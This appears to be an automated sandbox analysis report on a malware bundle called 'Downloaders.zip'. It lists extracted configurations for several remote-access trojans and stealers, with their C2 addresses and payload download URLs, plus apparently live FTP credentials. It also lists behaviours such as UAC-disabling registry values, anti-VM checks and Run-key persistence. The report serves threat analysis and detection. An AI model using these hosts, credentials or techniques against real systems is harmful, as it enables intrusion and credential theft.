Resubmissions
28-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 327-11-2024 19:02
241127-xpxqfsslan 327-11-2024 18:32
241127-w6pkqs1mek 10Analysis
-
max time kernel
646s -
max time network
711s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
27-11-2024 00:33
Static task
static1
Behavioral task
behavioral1
Sample
Downloaders.zip
Resource
win10ltsc2021-20241023-en
General
-
Target
Downloaders.zip
-
Size
12KB
-
MD5
94fe78dc42e3403d06477f995770733c
-
SHA1
ea6ba4a14bab2a976d62ea7ddd4940ec90560586
-
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
-
SHA512
add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
-
SSDEEP
384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB
Malware Config
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
Protocol: ftp- Host:
156.245.40.3 - Port:
21 - Username:
admin - Password:
Networkp4ss
Extracted
Protocol: ftp- Host:
23.82.58.9 - Port:
21 - Username:
user - Password:
Salam
Extracted
Protocol: ftp- Host:
132.248.104.13 - Port:
21 - Username:
user - Password:
asdf
Extracted
Protocol: ftp- Host:
192.185.76.16 - Port:
21 - Username:
ftp
Extracted
Protocol: ftp- Host:
68.178.226.18 - Port:
21 - Username:
ftp - Password:
PC123
Extracted
Protocol: ftp- Host:
94.229.78.20 - Port:
21 - Username:
ftp
Extracted
quasar
1.4.0
Office04
microsoftsys.ddns.net:4782
67e0653d-eedf-4888-88ab-78e97eb2df27
-
encryption_key
23E5F6D22FEE1750D36544A759A48349B064BC34
-
install_name
PerfWatson1.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhost
-
subdirectory
KDOT
Extracted
xworm
3.1
18.181.154.24:7000
w8DsMRIhXrOmk0Gn
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
redline
newbundle2
185.215.113.67:15206
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
85.198.108.36:7667
egghlcckqridunl
-
delay
6
-
install
false
-
install_folder
%Temp%
Extracted
xworm
5.0
68.178.207.33:7000
104.219.239.11:6969
154.197.69.165:7000
sSM7p4MT4JctLnRS
-
install_file
USB.exe
Extracted
redline
25072023
185.215.113.67:40960
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
Asyncrat family
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/5144-2395-0x0000026123B10000-0x0000026123B1E000-memory.dmp disable_win_def -
Detect Socks5Systemz Payload 1 IoCs
resource yara_rule behavioral1/memory/2372-520-0x00000000009E0000-0x0000000000A82000-memory.dmp family_socks5systemz -
Detect Xworm Payload 11 IoCs
resource yara_rule behavioral1/memory/3756-293-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/files/0x00280000000450b6-565.dat family_xworm behavioral1/memory/652-573-0x00000000004E0000-0x00000000004EE000-memory.dmp family_xworm behavioral1/files/0x002a0000000450b0-635.dat family_xworm behavioral1/memory/3356-648-0x0000000000A00000-0x0000000000A16000-memory.dmp family_xworm behavioral1/memory/5144-2304-0x00000261256F0000-0x000002612571C000-memory.dmp family_xworm behavioral1/files/0x002a0000000451be-2402.dat family_xworm behavioral1/memory/5920-2420-0x0000000000B30000-0x0000000000B58000-memory.dmp family_xworm behavioral1/files/0x0028000000045282-4014.dat family_xworm behavioral1/files/0x002a0000000451e2-4026.dat family_xworm behavioral1/memory/7028-4085-0x0000000000290000-0x00000000002A0000-memory.dmp family_xworm -
Lokibot family
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6680 4092 cmd.exe 233 -
Quasar family
-
Quasar payload 3 IoCs
resource yara_rule behavioral1/files/0x0003000000000365-139.dat family_quasar behavioral1/memory/2484-149-0x0000000000F80000-0x00000000012A4000-memory.dmp family_quasar behavioral1/memory/3784-5944-0x0000000004960000-0x0000000004FEE000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 8 IoCs
resource yara_rule behavioral1/files/0x0029000000045077-334.dat family_redline behavioral1/memory/3376-346-0x0000000000B80000-0x0000000000BD2000-memory.dmp family_redline behavioral1/files/0x00280000000450da-2101.dat family_redline behavioral1/memory/5724-2109-0x0000000000C70000-0x0000000000CC2000-memory.dmp family_redline behavioral1/files/0x002b000000045342-10723.dat family_redline behavioral1/files/0x002c000000045342-10734.dat family_redline behavioral1/files/0x002c000000045359-12413.dat family_redline behavioral1/files/0x002900000004536b-13714.dat family_redline -
Redline family
-
SectopRAT payload 1 IoCs
resource yara_rule behavioral1/files/0x002900000004536b-13714.dat family_sectoprat -
Sectoprat family
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Socks5systemz family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/5144-2442-0x0000026123B60000-0x0000026123C80000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
description pid Process procid_target PID 9180 created 7352 9180 WerFault.exe 536 PID 1244 created 9288 1244 WerFault.exe 736 PID 9116 created 2556 9116 WerFault.exe 746 -
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 7132 created 3564 7132 Restructuring.pif 56 PID 6512 created 3564 6512 Updater.vbs.exe 56 PID 5744 created 2828 5744 AddInProcess32.exe 46 PID 7188 created 3564 7188 Reynolds.com 56 PID 4028 created 2828 4028 rh.exe 46 PID 7616 created 3564 7616 Possibly.pif 56 PID 3632 created 7352 3632 svchost.exe 536 PID 3632 created 7352 3632 svchost.exe 536 PID 7032 created 3564 7032 Possibly.pif 56 PID 8016 created 9288 8016 svchost.exe 736 PID 8016 created 2556 8016 svchost.exe 746 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/0x0004000000015ddb-528.dat family_xmrig behavioral1/files/0x0004000000015ddb-528.dat xmrig -
Xmrig family
-
Xred family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x002b00000004533b-10670.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Client_protected.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rh.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 270 3816 powershell.exe 373 8140 powershell.exe 374 7428 powershell.exe 378 8020 mshta.exe 379 4752 powershell.exe 378 8020 mshta.exe -
pid Process 1004 powershell.exe 7428 powershell.exe 8140 powershell.exe 4752 powershell.exe 7748 powershell.exe 7872 powershell.exe 7448 powershell.exe 2728 powershell.exe 7200 powershell.exe 2300 powershell.exe 2624 powershell.exe 3340 powershell.exe 8072 powershell.exe 6404 powershell.exe 8608 powershell.exe 4268 powershell.exe 9912 powershell.exe 392 powershell.exe 3816 powershell.exe -
Contacts a large (1989) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Indicator Removal: Network Share Connection Removal 1 TTPs 4 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid Process 7092 net.exe 7888 net.exe 8224 cmd.exe 4396 net.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 7092 attrib.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " meshagent32-group.exe -
ACProtect 1.3x - 1.4x DLL software 1 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x002d00000004534f-12248.dat acprotect -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Client_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Client_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe -
Checks computer location settings 2 TTPs 38 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation tuwhzy.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation AV_DOW~1.EXE Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation ._cache_System.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation IMG001.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation IMG001.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation OneDrive.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation frap.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation Buyer.pif Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation 0fVlNye.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation Opdxdyeul.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PctOccurred.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation System.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation ConsiderableWinners.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation 9758xBqgE1azKnB.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation 9758xBqgE1azKnB.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PharmaciesDetection.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation av_downloader1.1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation caspol.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation PerfWatson1.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation iazsfn.exe Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 8 IoCs
description ioc Process File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url taskmgr.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk ._cache_System.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk ._cache_System.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk 9758xBqgE1azKnB.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url cmd.exe -
Executes dropped EXE 64 IoCs
pid Process 3828 fHR9z2C.exe 2484 built.exe 4384 PerfWatson1.exe 1432 9758xBqgE1azKnB.exe 640 PerfWatson1.exe 4384 PerfWatson1.exe 4268 PerfWatson1.exe 992 PerfWatson1.exe 3040 stail.exe 1672 stail.tmp 2372 lerryvideo.exe 4500 PerfWatson1.exe 1508 9758xBqgE1azKnB.exe 3756 9758xBqgE1azKnB.exe 3376 windowsexecutable.exe 4224 PerfWatson1.exe 1316 PerfWatson1.exe 3084 Client_protected.exe 1324 PerfWatson1.exe 3628 filer.exe 472 AmLzNi.exe 5004 PerfWatson1.exe 1724 xxz.exe 4632 Xworm%20V5.6.exe 652 XClient.exe 420 333.exe 2076 VBVEd6f.exe 1316 test12.exe 2452 test6.exe 3936 test14.exe 3356 taskhost.exe 680 pantest.exe 1324 test9.exe 188 test10-29.exe 556 test19.exe 1092 test10.exe 992 test_again4.exe 2652 test23.exe 1580 test5.exe 2052 test11.exe 1968 test20.exe 1816 test_again3.exe 5164 test16.exe 5260 test13.exe 5368 test_again2.exe 5468 test15.exe 5568 test18.exe 5656 test21.exe 5748 test22.exe 5828 test8.exe 5928 test7.exe 6036 test-again.exe 6132 test17.exe 5328 vg9qcBa.exe 5536 vg9qcBa.exe 5544 vg9qcBa.exe 5556 vg9qcBa.exe 5900 LoadNew.exe 5144 OneDrive.exe 1084 Armanivenntii_crypted_EASY.exe 5724 25072023.exe 5252 PctOccurred.exe 6776 crypted8888.exe 6240 win.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Wine rh.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Wine L.exe -
Loads dropped DLL 64 IoCs
pid Process 1672 stail.tmp 2372 lerryvideo.exe 1084 Armanivenntii_crypted_EASY.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe 3784 Synaptics.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x002a000000045094-405.dat themida behavioral1/memory/3084-418-0x00000000008B0000-0x0000000000F3E000-memory.dmp themida behavioral1/memory/3084-419-0x00000000008B0000-0x0000000000F3E000-memory.dmp themida behavioral1/memory/3084-434-0x00000000008B0000-0x0000000000F3E000-memory.dmp themida -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 45.155.250.90 -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook caspol.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 v7wa24td.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "\"C:\\Users\\Admin\\Desktop\\Files\\WindowsUI.exe\"" WindowsUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe" 9758xBqgE1azKnB.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" x4lburt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" System.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" IMG001.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\OneDrive.exe" tuwhzy.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bwapp = "C:\\Users\\Admin\\Desktop\\Files\\bwapp.exe" bwapp.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" Sniffthem.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" win.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" Opdxdyeul.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" OneDrive.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" audiodg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Client_protected.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: IMG001.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 50 raw.githubusercontent.com 49 raw.githubusercontent.com -
pid Process 6996 arp.exe 9656 cmd.exe 8744 ARP.EXE -
Power Settings 1 TTPs 12 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 7804 powercfg.exe 6808 cmd.exe 8380 powercfg.exe 8408 powercfg.exe 7968 powercfg.exe 7272 powercfg.exe 7128 powercfg.exe 6048 powercfg.exe 5888 powercfg.exe 8480 powercfg.exe 5296 powercfg.exe 3428 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x002c0000000450a3-450.dat autoit_exe -
Drops file in System32 directory 64 IoCs
